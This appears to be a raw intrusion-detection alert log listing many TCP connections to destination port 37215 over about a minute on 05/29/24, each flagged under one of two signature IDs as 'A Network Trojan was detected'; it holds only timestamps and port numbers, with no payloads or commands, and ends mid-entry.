                Timestamp:05/29/24-15:15:41.212049
                SID:2835222
                Source Port:34536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814839
                SID:2835222
                Source Port:44294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810108
                SID:2835222
                Source Port:46322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175636
                SID:2829579
                Source Port:38436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629071
                SID:2835222
                Source Port:37386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686775
                SID:2835222
                Source Port:57708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369714
                SID:2829579
                Source Port:58022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972660
                SID:2835222
                Source Port:35692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422169
                SID:2835222
                Source Port:51894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624917
                SID:2829579
                Source Port:57638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844709
                SID:2829579
                Source Port:50142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898125
                SID:2829579
                Source Port:40340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287070
                SID:2835222
                Source Port:52760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523784
                SID:2829579
                Source Port:45658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261986
                SID:2835222
                Source Port:48050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670391
                SID:2829579
                Source Port:36892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038092
                SID:2829579
                Source Port:54990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212058
                SID:2829579
                Source Port:37244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524040
                SID:2829579
                Source Port:53304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227588
                SID:2835222
                Source Port:51594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779392
                SID:2835222
                Source Port:46866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854103
                SID:2829579
                Source Port:49670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506363
                SID:2835222
                Source Port:44254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662663
                SID:2829579
                Source Port:55462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711969
                SID:2835222
                Source Port:35114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947254
                SID:2829579
                Source Port:45494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184434
                SID:2829579
                Source Port:41444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556195
                SID:2835222
                Source Port:54936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231542
                SID:2835222
                Source Port:38784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441274
                SID:2835222
                Source Port:46262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319612
                SID:2829579
                Source Port:33766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790684
                SID:2829579
                Source Port:33858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798661
                SID:2835222
                Source Port:46554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716392
                SID:2835222
                Source Port:53672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762769
                SID:2829579
                Source Port:51784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717187
                SID:2835222
                Source Port:52264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666383
                SID:2835222
                Source Port:40784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862131
                SID:2835222
                Source Port:42978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654078
                SID:2835222
                Source Port:39214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728681
                SID:2835222
                Source Port:49320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586880
                SID:2829579
                Source Port:54660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013263
                SID:2829579
                Source Port:38494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222097
                SID:2835222
                Source Port:34854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.557329
                SID:2829579
                Source Port:40442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162604
                SID:2829579
                Source Port:33954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503426
                SID:2829579
                Source Port:49278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362496
                SID:2829579
                Source Port:38374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786879
                SID:2835222
                Source Port:55788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024660
                SID:2835222
                Source Port:33072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.459396
                SID:2835222
                Source Port:45300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.945001
                SID:2835222
                Source Port:42910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.714396
                SID:2829579
                Source Port:41650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897313
                SID:2835222
                Source Port:56634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436115
                SID:2829579
                Source Port:51700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467471
                SID:2835222
                Source Port:60824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663812
                SID:2829579
                Source Port:43860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927802
                SID:2829579
                Source Port:36876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499465
                SID:2835222
                Source Port:51416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282188
                SID:2835222
                Source Port:41914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038531
                SID:2829579
                Source Port:57466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981051
                SID:2835222
                Source Port:57672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.945047
                SID:2835222
                Source Port:36018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433881
                SID:2829579
                Source Port:49784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378542
                SID:2829579
                Source Port:56894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834598
                SID:2829579
                Source Port:53944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091201
                SID:2835222
                Source Port:58316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227925
                SID:2835222
                Source Port:41150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.336040
                SID:2835222
                Source Port:46596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180561
                SID:2829579
                Source Port:49392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666930
                SID:2835222
                Source Port:44342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562035
                SID:2829579
                Source Port:56164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025285
                SID:2829579
                Source Port:37810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.080678
                SID:2835222
                Source Port:39762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027321
                SID:2835222
                Source Port:56908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706311
                SID:2829579
                Source Port:46728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812990
                SID:2835222
                Source Port:47790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556253
                SID:2835222
                Source Port:51890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421971
                SID:2835222
                Source Port:45652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512585
                SID:2835222
                Source Port:51910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226123
                SID:2829579
                Source Port:44034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712458
                SID:2835222
                Source Port:52574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.275864
                SID:2829579
                Source Port:56886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779426
                SID:2829579
                Source Port:37762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685961
                SID:2829579
                Source Port:37782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946286
                SID:2835222
                Source Port:55812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436529
                SID:2835222
                Source Port:37038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212159
                SID:2829579
                Source Port:46642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618496
                SID:2835222
                Source Port:41020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039368
                SID:2829579
                Source Port:53172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559764
                SID:2829579
                Source Port:44344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.458661
                SID:2835222
                Source Port:48012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179601
                SID:2835222
                Source Port:45176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784584
                SID:2829579
                Source Port:53546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418554
                SID:2835222
                Source Port:58062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.732870
                SID:2835222
                Source Port:42686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655123
                SID:2829579
                Source Port:33176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896218
                SID:2835222
                Source Port:54948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728977
                SID:2829579
                Source Port:45718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834697
                SID:2829579
                Source Port:57168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.038140
                SID:2835222
                Source Port:45718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717021
                SID:2835222
                Source Port:46060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374721
                SID:2829579
                Source Port:37034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449773
                SID:2835222
                Source Port:60710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557713
                SID:2835222
                Source Port:50406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421856
                SID:2835222
                Source Port:57736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435868
                SID:2829579
                Source Port:54192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429368
                SID:2835222
                Source Port:40062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319426
                SID:2835222
                Source Port:46092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269684
                SID:2835222
                Source Port:40564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708505
                SID:2835222
                Source Port:33684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681806
                SID:2829579
                Source Port:46784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831154
                SID:2835222
                Source Port:50648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.270285
                SID:2835222
                Source Port:58318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038416
                SID:2829579
                Source Port:60572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420297
                SID:2835222
                Source Port:40072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840152
                SID:2829579
                Source Port:44466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800816
                SID:2829579
                Source Port:57650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287697
                SID:2835222
                Source Port:34936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420437
                SID:2835222
                Source Port:33862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900352
                SID:2829579
                Source Port:34366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.574675
                SID:2835222
                Source Port:53142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668949
                SID:2835222
                Source Port:56312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897256
                SID:2829579
                Source Port:39948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136116
                SID:2835222
                Source Port:48428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868267
                SID:2829579
                Source Port:45212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505060
                SID:2835222
                Source Port:45864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223863
                SID:2829579
                Source Port:48838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468474
                SID:2829579
                Source Port:51014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024577
                SID:2829579
                Source Port:42244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088269
                SID:2829579
                Source Port:38374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986805
                SID:2835222
                Source Port:39248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264899
                SID:2835222
                Source Port:47188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800323
                SID:2835222
                Source Port:45016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656065
                SID:2835222
                Source Port:58634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.035558
                SID:2835222
                Source Port:59112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765023
                SID:2835222
                Source Port:50498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514347
                SID:2835222
                Source Port:35980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970504
                SID:2835222
                Source Port:54210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684525
                SID:2829579
                Source Port:33712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981002
                SID:2829579
                Source Port:34566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417637
                SID:2829579
                Source Port:34914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.564822
                SID:2835222
                Source Port:51418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912939
                SID:2835222
                Source Port:43382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290404
                SID:2835222
                Source Port:60290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865946
                SID:2835222
                Source Port:51366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948468
                SID:2835222
                Source Port:45540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175070
                SID:2835222
                Source Port:36036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137073
                SID:2835222
                Source Port:54264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267667
                SID:2829579
                Source Port:50534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982943
                SID:2829579
                Source Port:54610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072749
                SID:2829579
                Source Port:54300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002167
                SID:2835222
                Source Port:51202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.625038
                SID:2829579
                Source Port:39046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263822
                SID:2835222
                Source Port:55832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919720
                SID:2829579
                Source Port:45906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561101
                SID:2829579
                Source Port:57564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665332
                SID:2835222
                Source Port:53258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042869
                SID:2835222
                Source Port:49310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791090
                SID:2835222
                Source Port:49118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320964
                SID:2835222
                Source Port:46286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702451
                SID:2829579
                Source Port:39896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182870
                SID:2829579
                Source Port:51940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521816
                SID:2835222
                Source Port:46124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358650
                SID:2829579
                Source Port:42546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511449
                SID:2829579
                Source Port:49638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897223
                SID:2829579
                Source Port:48782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575027
                SID:2829579
                Source Port:43440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.229061
                SID:2829579
                Source Port:59770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463227
                SID:2829579
                Source Port:57300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843511
                SID:2835222
                Source Port:36600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140967
                SID:2835222
                Source Port:55984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784634
                SID:2829579
                Source Port:59050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432494
                SID:2835222
                Source Port:60218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786659
                SID:2835222
                Source Port:48112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224224
                SID:2835222
                Source Port:48640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882368
                SID:2835222
                Source Port:37658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324295
                SID:2835222
                Source Port:44068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795575
                SID:2835222
                Source Port:39618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433859
                SID:2835222
                Source Port:45046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854480
                SID:2829579
                Source Port:40546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014843
                SID:2835222
                Source Port:53780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842192
                SID:2835222
                Source Port:56680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628780
                SID:2835222
                Source Port:42256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.811754
                SID:2829579
                Source Port:33686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612046
                SID:2829579
                Source Port:49476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967589
                SID:2835222
                Source Port:41226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237477
                SID:2835222
                Source Port:36548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667403
                SID:2829579
                Source Port:57576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901191
                SID:2835222
                Source Port:41216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885800
                SID:2829579
                Source Port:47826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728365
                SID:2829579
                Source Port:47620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.058513
                SID:2829579
                Source Port:48692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716632
                SID:2835222
                Source Port:40790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.430800
                SID:2829579
                Source Port:59244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.392506
                SID:2835222
                Source Port:37320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561948
                SID:2835222
                Source Port:33940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943972
                SID:2829579
                Source Port:56458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521334
